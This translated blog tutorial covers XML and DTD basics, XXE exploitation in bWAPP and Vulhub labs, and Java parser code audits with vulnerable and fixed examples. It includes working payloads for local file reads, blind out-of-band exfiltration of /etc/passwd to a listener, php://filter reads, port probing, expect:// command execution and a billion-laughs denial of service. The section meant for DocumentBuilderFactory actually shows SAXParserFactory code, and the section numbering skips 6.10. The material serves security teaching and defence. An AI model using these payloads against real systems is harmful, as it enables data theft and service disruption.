[Network Security] JAVA code audit - XXE external entity injection


1. WEB security part

To understand XXE you first need to understand the basics of XML.

2. XML Basics

2.1 XML syntax

1. All XML elements must have a closing tag

2. XML tags are case sensitive

3. XML must be properly nested

4. XML documents must have a root element

5. XML attribute values must be quoted

Entity references: the < and > symbols may appear in attribute values and element content, but they have a special meaning in XML, so they must be written as the corresponding entity: the entity for < is &lt; and the entity for > is &gt;.

In XML, whitespace is preserved: in <p>a space B</p>, the space between a and B is kept.

2.2 XML structure

2.2.1 XML document declaration

<?xml version="1.0" encoding="utf-8"?>

2.2.2 Elements

Elements are the main building blocks of XML and HTML documents, and elements can contain text, other elements, or be empty.

<body> body text in between </body>
<message> some message in between </message>

Examples of empty elements are hr, br and img.

2.2.3 Attributes

Attributes provide additional information about an element

<img src="computer.gif"/>

Here, src is an attribute.

2.2.4 Entities

Entities are divided into four types, namely:

  • character entity

  • named entity

  • external entity

  • parameter entity

2.3 Document Type Definition--DTD

DTD is used to standardize the XML document format. It can be used to describe which elements/attributes are legal and how elements should be nested/combined. It can also be used to customize some special characters and reusable code segments as entities.

A DTD can be embedded in an XML document (internal declaration) or stored in a separate file (external reference)

2.3.1 Internal DTD declaration

If the DTD is included in your XML source file, it should be wrapped in a DOCTYPE declaration with the following syntax:

<!DOCTYPE root element [element declaration]>

Example of an internally declared DTD:

<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note>

The above DTD is interpreted as follows:

  • !DOCTYPE note (second line) defines that this document is a document of type note.

  • !ELEMENT note (the third line) defines that the note element has four child elements: "to, from, heading, body"

  • !ELEMENT to (fourth line) defines the to element as "#PCDATA" type

  • !ELEMENT from (line 5) defines the from element as "#PCDATA" type

  • !ELEMENT heading (line 6) defines the heading element as "#PCDATA" type

  • !ELEMENT body (line 7) defines the body element as "#PCDATA" type

2.3.2 DTD external reference

If the DTD is external to the XML source file, it should be encapsulated in a DOCTYPE definition with the following syntax:

<!DOCTYPE root element SYSTEM "filename">

This XML document is the same as the XML document above, but has an external DTD:

<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note> 

note.dtd:

<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)> 

2.3.3 PCDATA

PCDATA means parsed character data.

PCDATA is text that will be parsed by the parser: it is checked for entities and tags, tags in the text are treated as markup, and entities are expanded. Note that PCDATA should not contain the raw characters &, < and >; use the entities &amp;, &lt; and &gt; instead, or use CDATA.

2.3.4 CDATA

CDATA means character data.

CDATA is text that will not be parsed by the parser.

The characters & and < are illegal inside XML text, because the parser interprets < as the start of a new element and & as the start of a character entity. When you need to include content with many & and < characters, use CDATA.

A CDATA section begins with <![CDATA[ and is terminated by ]]>. A CDATA section cannot contain the string ]]>, and CDATA sections cannot be nested. The closing ]]> must not contain any spaces or line breaks.

2.3.5 DTD entities

DTD entities are variables used to define shortcuts that refer to plain text or special characters, and can be declared internally or referenced externally.

Entities are divided into general entities and parameter entities.

1. Declaration syntax of a general entity: <!ENTITY name "value">

The way to refer to the entity: &name;

2. Parameter entities can only be used inside the DTD. Declaration syntax of a parameter entity: <!ENTITY % name "value">

The way to refer to the entity: %name;

2.3.5.1 Internal entities

<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

<author>&writer;&copyright;</author>

2.3.5.2 External entities

External entities are used to introduce external resources. There are two keywords, SYSTEM and PUBLIC, which indicate whether the entity comes from a local system or from a public resource.

<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

<author>&writer;&copyright;</author>

Different parsers support different protocols:

LIBXML2        PHP              JAVA       .NET
file           file             http       file
http           http             https      http
ftp            ftp              ftp        https
               php              file       ftp
               compress.zlib    jar
               compress.bzip2   netdoc
               data             mailto
               glob             gopher *
               phar

PHP supports the most protocols, but some of them require specific extensions.

3. XXE

XXE stands for XML External Entity injection. As shown above, external entities are DTD external entities. XXE arises when the XML parser resolves attacker-supplied external entities and thereby loads attacker-chosen external resources, which can lead to file disclosure, command execution, internal port scanning, attacks on internal web applications, denial of service and other harm.


3.1 How to judge whether there is XXE

Take the bWAPP range as an example.

First check the HTTP headers for XML-related strings.

Then determine whether the XML content is actually parsed.

If the server parses the modified content and returns it, the XML is being parsed.

3.2 Hazards that XXE can cause

3.2.1 Reading files

The main use of XXE is reading files; here I use the bWAPP range as the environment.

When I built the environment I used PHP version 5.2.17, set up with phpstudy. If the PHP version is higher than 5.2.17, or with the Docker environment (PHP version 5.5.9), there is no echo. Of course it may just be a problem with my environment, but if the correct payload on the low difficulty level displays "An error occurred!", you can try my method.

3.2.1.1 With echo

First open the XXE vulnerability test page:

http://192.168.0.105/bwapp/xxe-1.php

Capture the request and notice that text/xml is present.

Modify the data and observe whether the server parses the XML content.

Once it is confirmed that the server parses the XML content, you can construct the injection yourself:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE test[<!ENTITY bee SYSTEM "file:///d:/robots.txt">
]>

<reset><login>&bee;</login><secret>Any bugs?</secret></reset> 

The external entity "bee" is assigned the value file:///d:/robots.txt; when the XML document is parsed, &bee; is replaced with the contents of file:///d:/robots.txt, which are then echoed back.

3.2.1.2 No echo (Blind XXE)

In real environments, however, the XML is usually not meant for output, so most of the time nothing is echoed. Even if the XML is parsed, the file cannot be read directly, so the data has to be sent out of band and read there.

Range environment: Vulhub - Docker-Compose file for vulnerability environment

After setting up the environment, open http://192.168.3.25:8983/solr/#/demo/query, click submit, capture the request and send it to the repeater.

On a host that the target server can reach (the local host in bridged mode, or a cloud server), create a DTD file:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd "<!ENTITY data SYSTEM ':%file;'>"> 

After creating it, modify the payload in the captured request.


Decoded, the payload is:

<?xml version="1.0" ?><!DOCTYPE r [<!ENTITY % send SYSTEM "http://192.168.3.35/xxe.dtd">%send;%dtd;]><r>&data;</r>&wt=xml&defType=xmlparser

Note: http://192.168.3.35/xxe.dtd must be changed to your own address, and when sending the request do not URL-encode &wt=xml&defType=xmlparser; paste it in as-is.

The above works when PHP reports an error that contains the data; if PHP does not report an error, use the following method.

First listen on a port, then modify the DTD file from above:

<!ENTITY % file SYSTEM "file:///h:/test.txt">
<!ENTITY % dtd "<!ENTITY data SYSTEM '192.168.3.35:666/?%file;'>"> 

Append the listening port to the URL; after sending the request, the listener receives the data. If nothing arrives, check the server logs.

Here I borrow someone else's screenshot.

Reference: XXE漏洞详解——进阶篇 (FreeBuf)

I did not manage to reproduce this here; it may be because the file was already read out directly via the error, but I record this case anyway.

3.2.1.3 Reading PHP and similar files

Some files, such as PHP files, contain characters like <; when read, the parser interprets them as XML markup and raises a syntax error. To avoid this, use a pseudo-protocol (php://filter) that base64-encodes the content on read:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE test[<!ENTITY bee SYSTEM "php://filter/read=convert.base64-encode/resource=file:///d:/robots.txt">
]>

<reset><login>&bee;</login><secret>Any bugs?</secret></reset> 

3.2.1.4 Port probing

Again using the bWAPP range as the environment.

The process is basically the same as before: capture the request and construct the injection.

Append a port to the http URL. If the port is open, "failed to open stream: HTTP request failed!" is displayed; otherwise nothing is displayed (or "failed to open stream: Connection refused!" or a 500 status code is returned).

I use phpstudy as the environment here, so port 3306 is open.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY bee SYSTEM "http://192.168.3.25:3306">
]>

Testing port 666, which is not open on the machine: after sending the request it took a long time before the response arrived, ending in a 500 error code.

Testing port 1234, also not open on this machine: again the response only arrived after a short wait.

3.2.1.5 Remote command execution (RCE)

RCE requires the expect protocol; other protocols may also be able to execute commands.

expect requires the expect extension to be installed.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY bee SYSTEM "expect://whoami">
]>

3.2.1.6 DDoS attack

Reference: XXE从入门到放弃 (anquanke.com)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "abc">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

This attack creates a recursive XML entity definition that expands to a billion "abc" strings in memory, causing denial of service. The principle: a malicious XML entity definition exhausts the available memory, because many XML parsers keep the whole document structure in memory while parsing; parsing becomes extremely slow and the service is denied.

3.2.1.7 Defending against XXE

Option 1: use the method provided by the development language to disable external entities

PHP:
libxml_disable_entity_loader(true);

JAVA: see the code audit below

Python:
For the third-party module lxml, change the parser settings as follows:

from lxml import etree

xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))

def xxe():
    # Entity resolution is switched off, so external entities are not expanded
    tree = etree.parse('xml.xml', etree.XMLParser(resolve_entities=False))
    # tree = lxml.objectify.parse('xml.xml', etree.XMLParser(resolve_entities=False))
    return etree.tostring(tree.getroot())

Or switch to defusedxml, a pure-Python package that provides modified subclasses of all standard-library XML parsers to prevent potentially malicious operations; it is recommended for any server code that parses untrusted XML data.

Option 2: filter the XML data submitted by users

Keywords: <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.

Do not allow the XML to contain any self-declared DTD.

An effective measure is to configure the XML parser to use only a static DTD and forbid external inclusion; for Java, simply set the corresponding property values to false.

Reference: XXE详解 (bylfsj's blog, CSDN)

4. JAVA code audit part

XXE is short for XML External Entity Injection. When developers allow the XML parser to resolve external entities, an attacker can craft malicious external entities to achieve arbitrary file reading, internal port probing, command execution, denial-of-service and other attacks.

XXE requires three conditions: the XML is parsed, the XML content is externally controllable, and external entities are not disabled.

5. Common XML interfaces

5.1 XMLReader

The XMLReader interface reads XML documents through callbacks and is part of the public API. It is the interface an XML parser must implement to act as a SAX2 driver; it lets applications set and query parser features and properties, register event handlers for document processing, and start parsing. When XMLReader is used with its default settings and the XML is not filtered, an XXE vulnerability arises.

5.2 SAXBuilder

SAXBuilder is a JDOM parser that builds a Document object from an XML file on a path. It delegates the parsing work to a third-party SAX parser and listens to SAX events with a SAXHandler instance. When SAXBuilder is used with its default settings and the XML is not filtered, an XXE vulnerability arises.

5.3 SAXReader

DOM4J is an open-source XML parsing package from dom4j.org; it is very simple to use for anyone who knows the basic XML DOM model. Reading and writing XML with DOM4J relies mainly on the org.dom4j.io package, which offers two approaches, DOMReader and SAXReader; since both implement the same interface, they are called in exactly the same way. Likewise, with the default parsing settings and unfiltered XML, an XXE vulnerability arises.

5.4 SAXParserFactory

SAXParserFactory lets applications configure and obtain a SAX-based parser to parse XML documents. Its constructor is protected, so newInstance() must be used. As above, with the default parsing settings and unfiltered XML, an XXE vulnerability arises.

5.5 Digester

The Digester class maps XML onto Java classes to simplify XML processing. It is part of the Apache Commons library (the commons-digester jar). With its default configuration it is likewise vulnerable to XXE. The XXE it triggers has no echo, so it generally has to be exploited with Blind XXE techniques.

5.6 DocumentBuilderFactory

DocumentBuilderFactory in the javax.xml.parsers package creates DOM-mode parser objects. It is an abstract factory class that cannot be instantiated directly, but it provides a newInstance() method that automatically creates and returns a factory object based on the parser installed by default on the local platform.

6. Interface code audit & fixes

From the principle of XXE, defending against it comes down to the following points:

1. Do not parse XML at all, although the business sometimes requires it

2. Disable DTDs, which is likewise often not feasible

3. Disable external entities and parameter entities

In most cases the parser's behaviour can be controlled by setting features:

// This is the preferred option. Disallowing DTDs (doctypes) blocks almost all XML entity attacks
setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// If DTDs cannot be disabled completely, at least apply the following two; both must be present
setFeature("http://xml.org/sax/features/external-general-entities", false);   // blocks external general entity PoCs
setFeature("http://xml.org/sax/features/external-parameter-entities", false); // blocks parameter entity PoCs

If XInclude is enabled, add the following before the feature rules:

dbf.setXIncludeAware(true);  // enable XInclude
dbf.setNamespaceAware(true); // XInclude requires namespace awareness
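The two configurations just described, applied to a DocumentBuilderFactory (the interface from 5.6, for which no fix code is shown below) in an added, self-contained Java example that is not code from this page or from java-sec-code: it feeds a benign note document, a DOCTYPE with an external entity modelled on the bee payload (placeholder file path), and the billion-laughs document from 3.2.1.6 through a strict factory (DOCTYPE refused) and a DTD-tolerant factory (external entities switched off, JDK secure-processing limits on). The strict factory rejects both malicious inputs at the DOCTYPE; the tolerant one skips &bee; without fetching it and stops lol9 at the JDK entity-expansion limit. Assumes Java 11+ (String.repeat); class and method names are my own.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class XxeHardeningDemo {
    // Option 1 from the text (preferred): refuse any DOCTYPE, which removes the entity mechanism.
    static DocumentBuilderFactory strictFactory() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }
    // Option 2: DTDs must stay allowed, so switch off both external entity kinds; secure processing keeps the JDK expansion limits on.
    static DocumentBuilderFactory dtdTolerantFactory() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }
    // Returns the root element name on success, or the parser's rejection message.
    static String tryParse(DocumentBuilderFactory dbf, String xml) {
        try {
            Document doc = dbf.newDocumentBuilder()
                    .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return "parsed, root <" + doc.getDocumentElement().getNodeName() + ">";
        } catch (Exception e) {
            return "REJECTED: " + e.getMessage();
        }
    }
    public static void main(String[] args) throws Exception {
        // Constructed inputs modelled on the page's payloads; the file path is a placeholder.
        String benign = "<?xml version=\"1.0\"?><note><to>George</to><from>John</from></note>";
        String external = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE test [<!ENTITY bee SYSTEM \"file:///placeholder.txt\">]>"
                + "<reset><login>&bee;</login></reset>";
        // Billion laughs: lol2..lol9 each expand to ten copies of the previous entity (10^9 "abc").
        StringBuilder lol = new StringBuilder("<?xml version=\"1.0\"?><!DOCTYPE lolz [<!ENTITY lol \"abc\">");
        for (int i = 2; i <= 9; i++) {
            String ref = (i == 2) ? "&lol;" : "&lol" + (i - 1) + ";";
            lol.append("<!ENTITY lol").append(i).append(" \"").append(ref.repeat(10)).append("\">");
        }
        lol.append("]><lolz>&lol9;</lolz>");
        DocumentBuilderFactory[] factories = {strictFactory(), dtdTolerantFactory()};
        String[] names = {"strict", "dtd-tolerant"};
        for (int k = 0; k < factories.length; k++) {
            System.out.println(names[k] + " / benign:   " + tryParse(factories[k], benign));
            System.out.println(names[k] + " / external: " + tryParse(factories[k], external));
            System.out.println(names[k] + " / billion:  " + tryParse(factories[k], lol.toString()));
        }
    }
}
```

With the tolerant factory the external document still parses, but the login element stays empty because the external entity is never resolved; the billion-laughs document fails with the JDK's JAXP00010001 entity-expansion message.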

All the code below comes from: java-sec-code/XXE.java at master · JoyChou93/java-sec-code (github.com)

6.1 XMLReader

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    XMLReader xmlReader = XMLReaderFactory.createXMLReader();
    xmlReader.parse(new InputSource(new StringReader(body))); // parse xml
    return "xmlReader xxe vuln code";
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.2 Fix code

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    XMLReader xmlReader = XMLReaderFactory.createXMLReader();
    // fix code start
    xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // fix code end
    xmlReader.parse(new InputSource(new StringReader(body))); // parse xml
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.3 SAXBuilder

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXBuilder builder = new SAXBuilder();
    // org.jdom2.Document document
    builder.build(new InputSource(new StringReader(body))); // cause xxe
    return "SAXBuilder xxe vuln code";
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.4 Fix code:

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXBuilder builder = new SAXBuilder();
    // fix code start
    builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
    builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // fix code end
    // org.jdom2.Document document
    builder.build(new InputSource(new StringReader(body)));
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.5 SAXReader

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXReader reader = new SAXReader();
    // org.dom4j.Document document
    reader.read(new InputSource(new StringReader(body))); // cause xxe
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

Fix code:

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXReader reader = new SAXReader();
    // fix code start
    reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // fix code end
    // org.dom4j.Document document
    reader.read(new InputSource(new StringReader(body)));
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.6 SAXParserFactory

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXParserFactory spf = SAXParserFactory.newInstance();
    SAXParser parser = spf.newSAXParser();
    parser.parse(new InputSource(new StringReader(body)), new DefaultHandler()); // parse xml
    return "SAXParser xxe vuln code";
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.7 Fix code:

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXParserFactory spf = SAXParserFactory.newInstance();
    // fix code start
    spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // fix code end
    SAXParser parser = spf.newSAXParser();
    parser.parse(new InputSource(new StringReader(body)), new DefaultHandler()); // parse xml
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.8 Digester

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    Digester digester = new Digester();
    digester.parse(new StringReader(body)); // parse xml
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

Fix code:

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    Digester digester = new Digester();
    // fix code start
    digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    digester.setFeature("http://xml.org/sax/features/external-general-entities", false);
    digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // fix code end
    digester.parse(new StringReader(body)); // parse xml
    return "Digester xxe security code";
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.9 DocumentBuilderFactory

Fix code:

try {
    String body = WebUtils.getRequestBody(request);
    logger.info(body);
    SAXParserFactory spf = SAXParserFactory.newInstance();
    SAXParser saxParser = spf.newSAXParser();
    XMLReader xmlReader = saxParser.getXMLReader();
    xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    xmlReader.parse(new InputSource(new StringReader(body)));
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

6.11 DocumentHelper

try {
    String body = WebUtils.getRequestBody(req);
    DocumentHelper.parseText(body); // parse xml
} catch (Exception e) {
    logger.error(e.toString());
    return EXCEPT;
}

To fix this vulnerability, upgrade dom4j to 2.1.1 or later; from that version on, ENTITY is disabled.

A PoC without ENTITY cannot be exploited, so disabling ENTITY completes the fix.


Source: blog.csdn.net/qq_44005305/article/details/128584077